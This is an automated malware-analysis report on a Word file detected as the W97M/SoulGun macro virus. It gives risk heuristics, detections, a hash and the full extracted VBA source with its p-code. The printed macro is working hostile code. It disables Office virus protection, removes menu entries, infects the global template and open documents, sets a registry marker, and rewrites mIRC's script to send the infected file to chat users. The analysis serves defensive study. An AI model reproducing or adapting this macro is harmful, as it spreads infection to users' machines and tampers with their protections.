MALICIOUS
236
Risk Score
Heuristics 6
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
If actinf = False Then host.codemodule.ReplaceLine 1, "Sub AutoOpen()" -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11206 bytes |
SHA-256: 250511439c9c80934275d5b7f1552b03dce735f418fc44dbbbbd4276134ef98e |
|||
|
Detection
ClamAV:
Win.Trojan.C-286
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
'
'
'
'
'
'
'
On Error Resume Next
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
CommandBars("Tools").Controls("Macro").Delete
CommandBars("Tools").Controls("Templates and Add-Ins...").Delete
CommandBars("Format").Controls("Style...").Delete
Application.ScreenUpdating = False
Options.SendMailAttach = True
nomcnt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
actcnt = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If nomcnt >= 12 Then nominf = True Else nominf = False
If actcnt >= 12 Then actinf = True Else actinf = False
ActiveDocument.VBProject.VBComponents.Item(1).Name = NormalTemplate.VBProject.VBComponents.Item(1).Name
If actinf = True Then ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\chile.sys"
If nominf = False Then Set host = NormalTemplate.VBProject.VBComponents.Item(1)
If actinf = False Then Set host = ActiveDocument.VBProject.VBComponents.Item(1)
If nominf = False And System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main", "SoulGun") = "Installed" Then
MsgBox "sOUlGun has returned"
MsgBox "As far from god as heaven is wide As far from god as angels can fly", vbExclamation, "W97M/SOULGUN"
Application.Quit
If (Day(Now)) = 1 Then System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main", "SoulGun") = "Reprieved"
End If
If nominf = False Then System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main", "SoulGun") = "Installed"
host.codemodule.AddFromFile ("c:\chile.sys")
With host.codemodule
For x = 1 To 4
.deletelines 1
Next x
End With
If nominf = False Then host.codemodule.ReplaceLine 1, "Sub AutoClose()"
If actinf = False Then host.codemodule.ReplaceLine 1, "Sub AutoOpen()"
If actinf = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, fileformat:=wdFormatDocument
If nominf = False Then NormalTemplate.Save
If nominf = False And System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main", "SoulGun") = "Installed" Then
ActiveDocument.SaveAs FileName:="c:\Pornpass.doc", fileformat:=wdFormatDocument, AddToRecentFiles:=False, ReadOnlyRecommended:=False
On Error GoTo mircnothere
Kill "c:\mirc\script.ini"
Open "c:\mirc\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\Pornpass.doc }"
Print #1, "n1=on 1:CONNECT: {"
Print #1, "n2= /join #vir"
Print #1, "n3= /msg #vir As far from g0d as angels can fly....Another W97m/Soulgun Infected user"
Close 1
End If
mircnothere:
With host.codemodule
For x = 2 To 8
.ReplaceLine x, "' " & Application.UserInitials & Application.StartupPath & Now & Application.WindowState & Now
Next x
End With
End Sub
' Processing file: /opt/analyzer/scan_staging/63d6dfaac20c44938708877a5c0ccd82.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5386 bytes
' Line #0:
' FuncDefn (Sub AutoClose())
' Line #1:
' QuoteRem 0x0000 0x0000 ""
' Line #2:
' QuoteRem 0x0000 0x0000 ""
' Line #3:
' QuoteRem 0x0000 0x0000 ""
' Line #4:
' QuoteRem 0x0000 0x0000 ""
' Line #5:
' QuoteRem 0x0000 0x0000 ""
' Line #6:
' QuoteRem 0x0000 0x0000 ""
' Line #7:
' QuoteRem 0x0000 0x0000 ""
' Line #8:
' OnError (Resume Next)
' Line #9:
' StartWithExpr
' Ld Options
' With
' Line #10:
' LitVarSpecial (False)
' MemStWith ConfirmConversions
' Line #11:
' LitVarSpecial (False)
' MemStWith VirusProtection
' Line #12:
' LitVarSpecial (False)
' MemStWith SaveNormalPrompt
' Line #13:
' EndWith
' Line #14:
' Line #15:
' LitStr 0x0005 "Macro"
' LitStr 0x0005 "Tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' ArgsMemCall Delete 0x0000
' Line #16:
' LitStr 0x0018 "Templates and Add-Ins..."
' LitStr 0x0005 "Tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' ArgsMemCall Delete 0x0000
' Line #17:
' LitStr 0x0008 "Style..."
' LitStr 0x0006 "Format"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' ArgsMemCall Delete 0x0000
' Line #18:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #19:
' LitVarSpecial (True)
' Ld Options
' MemSt SendMailAttach
' Line #20:
' Line #21:
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' MemLd CountOfLines
' St nomcnt
' Line #22:
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' MemLd CountOfLines
' St actcnt
' Line #23:
' Line #24:
' Ld nomcnt
' LitDI2 0x000C
' Ge
' If
' BoSImplicit
' LitVarSpecial (True)
' St nominf
' Else
' BoSImplicit
' LitVarSpecial (False)
' St nominf
' EndIf
' Line #25:
' Ld actcnt
' LitDI2 0x000C
' Ge
' If
' BoSImplicit
' LitVarSpecial (True)
' St actinf
' Else
' BoSImplicit
' LitVarSpecial (False)
' St actinf
' EndIf
' Line #26:
' Line #27:
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd New
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemSt New
' Line #28:
' Line #29:
' Ld actinf
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' LitStr 0x000C "c:\chile.sys"
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' ArgsMemCall Export 0x0001
' EndIf
' Line #30:
' Ld nominf
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set host
' EndIf
' Line #31:
' Ld actinf
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set host
' EndIf
' Line #32:
' Ld nominf
' LitVarSpecial (False)
' Eq
' LitStr 0x0000 ""
' LitStr 0x003B "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main"
' LitStr 0x0007 "SoulGun"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x0009 "Installed"
' Eq
' And
' IfBlock
' Line #33:
' LitStr 0x0014 "sOUlGun has returned"
' ArgsCall MsgBox 0x0001
' Line #34:
' LitStr 0x0043 "As far from god as heaven is wide As far from god as angels can fly"
' Ld vbExclamation
' LitStr 0x000C "W97M/SOULGUN"
' ArgsCall MsgBox 0x0003
' Line #35:
' Ld Application
' ArgsMemCall Quit 0x0000
' Line #36:
' Line #37:
' Ld Now
' ArgsLd Day 0x0001
' Paren
' LitDI2 0x0001
' Eq
' If
' BoSImplicit
' LitStr 0x0009 "Reprieved"
' LitStr 0x0000 ""
' LitStr 0x003B "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main"
' LitStr 0x0007 "SoulGun"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' EndIf
' Line #38:
' EndIfBlock
' Line #39:
' Line #40:
' Ld nominf
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' LitStr 0x0009 "Installed"
' LitStr 0x0000 ""
' LitStr 0x003B "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main"
' LitStr 0x0007 "SoulGun"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' EndIf
' Line #41:
' LitStr 0x000C "c:\chile.sys"
' Paren
' Ld host
' MemLd codemodule
' ArgsMemCall AddFromFile 0x0001
' Line #42:
' Line #43:
' StartWithExpr
' Ld host
' MemLd codemodule
' With
' Line #44:
' StartForVariable
' Ld x
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0004
' For
' Line #45:
' LitDI2 0x0001
' ArgsMemCallWith deletelines 0x0001
' Line #46:
' StartForVariable
' Ld x
' EndForVariable
' NextVar
' Line #47:
' EndWith
' Line #48:
' Line #49:
' Ld nominf
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' LitDI2 0x0001
' LitStr 0x000F "Sub AutoClose()"
' Ld host
' MemLd codemodule
' ArgsMemCall ReplaceLine 0x0002
' EndIf
' Line #50:
' Ld actinf
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' LitDI2 0x0001
' LitStr 0x000E "Sub AutoOpen()"
' Ld host
' MemLd codemodule
' ArgsMemCall ReplaceLine 0x0002
' EndIf
' Line #51:
' Ld actinf
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' Ld ActiveDocument
' MemLd FullName
' ParamNamed FileName
' Ld wdFormatDocument
' ParamNamed fileformat
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0002
' EndIf
' Line #52:
' Ld nominf
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' Ld NormalTemplate
' ArgsMemCall Save 0x0000
' EndIf
' Line #53:
' Ld nominf
' LitVarSpecial (False)
' Eq
' LitStr 0x0000 ""
' LitStr 0x003B "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main"
' LitStr 0x0007 "SoulGun"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x0009 "Installed"
' Eq
' And
' IfBlock
' Line #54:
' Line #55:
' LitStr 0x000F "c:\Pornpass.doc"
' ParamNamed FileName
' Ld wdFormatDocument
' ParamNamed fileformat
' LitVarSpecial (False)
' ParamNamed AddToRecentFiles
' LitVarSpecial (False)
' ParamNamed ReadOnlyRecommended
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0004
' Line #56:
' OnError mircnothere
' Line #57:
' LitStr 0x0012 "c:\mirc\script.ini"
' ArgsCall Kill 0x0001
' Line #58:
' LitStr 0x0012 "c:\mirc\script.ini"
' LitDI2 0x0001
' LitDefault
' Open (For Output)
' Line #59:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0008 "[script]"
' PrintItemNL
' Line #60:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0047 "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\Pornpass.doc }"
' PrintItemNL
' Line #61:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0012 "n1=on 1:CONNECT: {"
' PrintItemNL
' Line #62:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000F "n2= /join #vir"
' PrintItemNL
' Line #63:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0056 "n3= /msg #vir As far from g0d as angels can fly....Another W97m/Soulgun Infected user"
' PrintItemNL
' Line #64:
' LitDI2 0x0001
' Close 0x0001
' Line #65:
' EndIfBlock
' Line #66:
' Label mircnothere
' Line #67:
' StartWithExpr
' Ld host
' MemLd codemodule
' With
' Line #68:
' StartForVariable
' Ld x
' EndForVariable
' LitDI2 0x0002
' LitDI2 0x0008
' For
' Line #69:
' Ld x
' LitStr 0x0002 "' "
' Ld Application
' MemLd UserInitials
' Concat
' Ld Application
' MemLd StartupPath
' Concat
' Ld Now
' Concat
' Ld Application
' MemLd WindowState
' Concat
' Ld Now
' Concat
' ArgsMemCallWith ReplaceLine 0x0002
' Line #70:
' StartForVariable
' Ld x
' EndForVariable
' NextVar
' Line #71:
' EndWith
' Line #72:
' EndSub
' Line #73:
' Line #74:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.